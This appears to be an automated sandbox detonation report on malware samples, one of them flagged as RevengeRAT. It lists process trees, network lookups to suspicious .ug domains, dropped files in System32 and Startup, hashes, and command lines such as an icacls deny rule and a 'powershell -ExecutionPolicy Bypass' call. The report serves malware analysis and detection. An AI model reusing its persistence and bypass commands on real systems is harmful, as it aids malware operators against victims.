PID 2392 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Windows\SysWOW64\icacls.exe
PID 2392 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Windows\SysWOW64\icacls.exe
PID 2392 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Windows\SysWOW64\icacls.exe
PID 2392 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 2392 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 2392 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 2392 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 2712 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 2712 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 2712 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 2712 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 2712 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 2712 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 2712 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 2712 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 2912 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 2912 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 2912 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 2912 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

Processes

C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

"C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe"

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\fd7cb3b1-643e-450d-b653-e142b5d81a51" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

"C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

"C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe" --ForNetRes "FsnDCf1u1wJvLcqbFxxtOchBf2V2lgtk24oM5mt2" 0h7mFQcjRC3pDgsRcrWZ7K7bdAgvgDos224DmXt1 IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

"C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe" --Service 2712 "FsnDCf1u1wJvLcqbFxxtOchBf2V2lgtk24oM5mt2" 0h7mFQcjRC3pDgsRcrWZ7K7bdAgvgDos224DmXt1

C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

"C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe" --Service 2912 "FsnDCf1u1wJvLcqbFxxtOchBf2V2lgtk24oM5mt2" 0h7mFQcjRC3pDgsRcrWZ7K7bdAgvgDos224DmXt1

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.2ip.ua udp
US 172.67.139.220:443 api.2ip.ua tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 172.67.139.220:443 api.2ip.ua tcp
US 8.8.8.8:53 loot.ug udp
US 8.8.8.8:53 ymad.ug udp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.252.143:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 23.192.22.93:80 www.microsoft.com tcp
US 172.67.139.220:443 api.2ip.ua tcp
US 172.67.139.220:443 api.2ip.ua tcp
US 172.67.139.220:443 api.2ip.ua tcp

Files

memory/2392-0-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/2392-2-0x00000000005A0000-0x00000000006A0000-memory.dmp

memory/2392-3-0x0000000000400000-0x0000000000476000-memory.dmp

C:\Users\Admin\AppData\Local\fd7cb3b1-643e-450d-b653-e142b5d81a51\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

MD5 ead18f3a909685922d7213714ea9a183
SHA1 1270bd7fd62acc00447b30f066bb23f4745869bf
SHA256 5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18
SHA512 6e532d9c3d186e4dac38823ae9152056346e283613f0caf088b21a1b3e5f4f6cf3bad8c407168b1072895a386e3be0b8c11ad1cb326d3d3ff0eb8562052def91

memory/2392-24-0x0000000003BE0000-0x0000000003C89000-memory.dmp

memory/2392-23-0x0000000003BE0000-0x0000000003C89000-memory.dmp

memory/2392-26-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/2392-27-0x00000000005A0000-0x00000000006A0000-memory.dmp

memory/2392-28-0x0000000000400000-0x0000000000476000-memory.dmp

memory/2712-29-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/2712-31-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/2712-32-0x0000000000400000-0x00000000004A9000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

MD5 971c514f84bba0785f80aa1c23edfd79
SHA1 732acea710a87530c6b08ecdf32a110d254a54c8
SHA256 f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA512 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

MD5 fafae5c3a1f01d29d6be9cfa306104dc
SHA1 8524ca1993f983f5af18c0daa0f1593a6f42280d
SHA256 1f76634bd1d8e11df6c02fcc74b44c0ae6ba678fe3a901a9026ad54caa0f77e2
SHA512 a9c5a470f3263668effcc2e1c2b8995baf4c52b53237a3f15be78bbcd599c37907a4284cc3b8cb7101c4d4781e7e3c34c05e065f4f318dfb2e58b41c97d3c80f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 67e486b2f148a3fca863728242b6273e
SHA1 452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256 facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512 d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 bd7966f5bee1a1b57ced2d181b1e507a
SHA1 a9f39920f2775b0dcb8da794ec37958f0a460f3b
SHA256 83846d6204515ef32788da3f6fe0847008b215126eaf639d5f38227e92eb9f39
SHA512 9ecabd4139da1cd927575347ca67748163e92d2a08058f46028b82b1d0a447009972694e33e042023be27a1866be9cdae48ca0add537d8ee4b7df35cfdc57bee

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6dabfffafdfc17cb1372c53f7f731a9e
SHA1 74179aa288dfc1fea544e2b9827be99383651042
SHA256 6cd4a06fc9390e7d8f2864d5ffdc848aa2fa7c763615968a38b369e736fd7bf8
SHA512 204a565f53caa3f4e4540c0c0f09daac000954976c16cc4d4dc8799d9a8bb0ad8d8bd99093a962ff6b1fc0462dd7a35b336086f1e3580578f9b0929dc92ae8eb

C:\Users\Admin\AppData\Local\Temp\Cab707F.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/2712-47-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/2712-49-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/2712-50-0x0000000000400000-0x00000000004A9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TarE947.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 36e01aff7285fc723e9861f00edf61a9
SHA1 8fb8002397f1ddeb562b1da1997fa54144c7315b
SHA256 ff5864a759a672b6526bccc558eebaae3d007fe4972a8e88fe13aa2c7fdc72c6
SHA512 17788774412d5aa95ada75c56ceba33059be4d27be1a276e9e850d3edfafb36b1292fff1f59b01d367ed99a6cd2b85afc8e2025fece702fe7ebe5d6cae99ac6f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 044325af443d47712cb6afa70c3ae3fd
SHA1 96443ca2a088c6f4bbd6639f4b4fb12a879fd070
SHA256 c8085cea13084a624b9ac7c783515b709c21a1404d98e454c15cb1d7e0341862
SHA512 81425bac630c69db97506020dc6a49f646e0588c75a12d4e11698c82bb85bc44af91e6139c0893f83a938ec50c39e854aaaf86746f6be7036b9a2fc4c5bfdae3

memory/2200-87-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/2912-88-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/3008-89-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/2712-90-0x0000000000400000-0x00000000004A9000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:59

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe"

Signatures

RevengeRAT

trojan revengerat

Revengerat family

revengerat

RevengeRat Executable

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MSO.exe C:\Windows\system32\MSSCS.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MSO.exe C:\Windows\system32\MSSCS.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\system32\MSSCS.exe N/A

Uses the VBS compiler for execution

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\MSSCS.exe C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe N/A
File opened for modification C:\Windows\system32\MSSCS.exe C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe N/A
File opened for modification C:\Windows\system32\MSSCS.exe C:\Windows\system32\MSSCS.exe N/A
File created C:\Windows\system32\MSSCS.exe C:\Windows\system32\MSSCS.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\MSSCS.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3340 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe C:\Windows\system32\MSSCS.exe
PID 3340 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe C:\Windows\system32\MSSCS.exe
PID 2384 wrote to memory of 4388 N/A C:\Windows\system32\MSSCS.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2384 wrote to memory of 4388 N/A C:\Windows\system32\MSSCS.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2384 wrote to memory of 3736 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2384 wrote to memory of 3736 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 3736 wrote to memory of 3012 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 3736 wrote to memory of 3012 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2384 wrote to memory of 1976 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2384 wrote to memory of 1976 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 1976 wrote to memory of 4492 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1976 wrote to memory of 4492 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2384 wrote to memory of 644 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2384 wrote to memory of 644 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 644 wrote to memory of 4236 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 644 wrote to memory of 4236 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2384 wrote to memory of 3092 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2384 wrote to memory of 3092 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 3092 wrote to memory of 1652 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 3092 wrote to memory of 1652 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2384 wrote to memory of 4044 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2384 wrote to memory of 4044 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4044 wrote to memory of 2916 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4044 wrote to memory of 2916 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2384 wrote to memory of 2832 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2384 wrote to memory of 2832 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2832 wrote to memory of 1468 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2832 wrote to memory of 1468 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2384 wrote to memory of 2972 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2384 wrote to memory of 2972 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2972 wrote to memory of 4144 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2972 wrote to memory of 4144 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2384 wrote to memory of 4332 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2384 wrote to memory of 4332 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4332 wrote to memory of 4972 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4332 wrote to memory of 4972 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2384 wrote to memory of 2460 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2384 wrote to memory of 2460 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2460 wrote to memory of 1060 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2460 wrote to memory of 1060 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2384 wrote to memory of 3784 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2384 wrote to memory of 3784 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 3784 wrote to memory of 1048 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 3784 wrote to memory of 1048 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

Processes

C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe

"C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe"

C:\Windows\system32\MSSCS.exe

"C:\Windows\system32\MSSCS.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -Command [System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [System.Windows.Forms.MessageBox]::Show('Isto abriu lol','Rekt!',0,64)

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\2ftnr_cu.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDB19.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9DA3FBAE4258484894F1ECC3A7387531.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\-shvcskp.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDC71.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc54A96236D0624DF6BBEC967FDF6C15.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ablc4dv5.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDD4B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc53F0601A12304F2F8A8B3C7B76198264.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\s5zqt77d.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDE16.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc5DB4E4F59B4C45319DCF21E39576916.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\8d7tl15i.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDE93.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc20C75D86C2234225A43086B041A6C5D2.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\6ae38hpy.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDF20.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD8BAA637720543F1925E5A8E67DF8F93.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\i_trai9o.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDF9D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF07B89C6C46142469E7210AF7975AEFE.TMP"

